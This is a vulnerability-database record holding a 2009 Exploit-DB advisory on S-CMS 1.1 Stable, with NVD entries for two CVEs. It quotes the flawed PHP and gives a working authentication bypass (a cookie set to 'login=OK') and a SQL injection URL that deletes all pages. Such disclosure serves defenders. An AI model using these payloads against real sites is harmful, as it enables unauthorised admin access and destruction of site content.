S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns

{"bulletinFamily": "exploit", "id": "EDB-ID:8071", "cvelist": ["CVE-2009-0864", "CVE-2009-0863"], "modified": "2009-02-17T00:00:00", "lastseen": "2016-02-01T03:41:08", "edition": 1, "sourceData": "#########################################################################################\n[0x01] Informations:\n\nName : S-Cms 1.1 Stable \nDownload : http://www.hotscripts.com/listings/jump/download/87992/\nVulnerability : Insecure Cookie Handling / Mass Page Delete\nAuthor : x0r\nContact : andry2000@hotmail.it\nNotes : Proud to be Italian \n#########################################################################################\n[0x02] Bug:\n\nBugged file is /[path]/login_action.php ... /admin/delete_page.php\n\n[Code]\n\n$user=$_POST['username'];\n$pass=$_POST['password'];\n\n$select_admin = mysql_query(\"SELECT * FROM cms_admin\");\n\nwhile($dati_admin=mysql_fetch_array($select_admin)){\n$username=$dati_admin['username'];\n$password=$dati_admin['password'];\n}\n\nif ($user == $username && $pass == $password){\n \n setcookie(\"login\", \"OK\", time() + $logintime); #0wn3d\n\n[/code]\n\n[CODE]\n\t\n\t\t$id=$_GET['id'];\n\t\t\n\t\t$delete=mysql_query(\"DELETE FROM cms_content WHERE id='$id'\");\n\t\t\n\t\t\n\t\tif ($delete){\n\t\t\n\t\techo \"\"._DELETE_PAGE_SUCCESS.\"\";\n\t\t\n\t\t} else {\n\t\t\n\t\techo \"\"._DELETE_PAGE_ERROR.\"\";\n[/code]\n\n#########################################################################################\n[0x03] Exploit:\n\nExploit: 1- javascript:document.cookie = \"login=OK; path=/\"\n 2- http://[victim].org/path/admin/delete_page.php?id=' or 1=1/*\n\n########################################################################################\n\n# milw0rm.com [2009-02-17]\n", "published": "2009-02-17T00:00:00", "href": "https://www.exploit-db.com/exploits/8071/", "osvdbidlist": ["52570", "52571"], "reporter": "x0r", "hash": "4446a80df3f7201e394fa1462f4c16e314a34136ddbd5653300f912ee1bbe310", "title": "S-CMS 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "S-Cms 1.1 Stable Insecure Cookie Handling / Mass Page Delete Vulns. CVE-2009-0863,CVE-2009-0864. Webapps exploit for php platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/8071/", "enchantments": {"vulnersScore": 5.5}}

{"result": {"cve": [{"id": "CVE-2009-0864", "type": "cve", "title": "CVE-2009-0864", "description": "S-Cms 1.1 Stable allows remote attackers to bypass authentication and obtain administrative access via an OK value for the login cookie.", "published": "2009-03-10T10:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0864", "cvelist": ["CVE-2009-0864"], "lastseen": "2017-08-17T11:14:15"}, {"id": "CVE-2009-0863", "type": "cve", "title": "CVE-2009-0863", "description": "SQL injection vulnerability in admin/delete_page.php in S-Cms 1.1 Stable allows remote attackers to execute arbitrary SQL commands via the id parameter.", "published": "2009-03-10T10:30:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-0863", "cvelist": ["CVE-2009-0863"], "lastseen": "2017-08-17T11:14:15"}]}}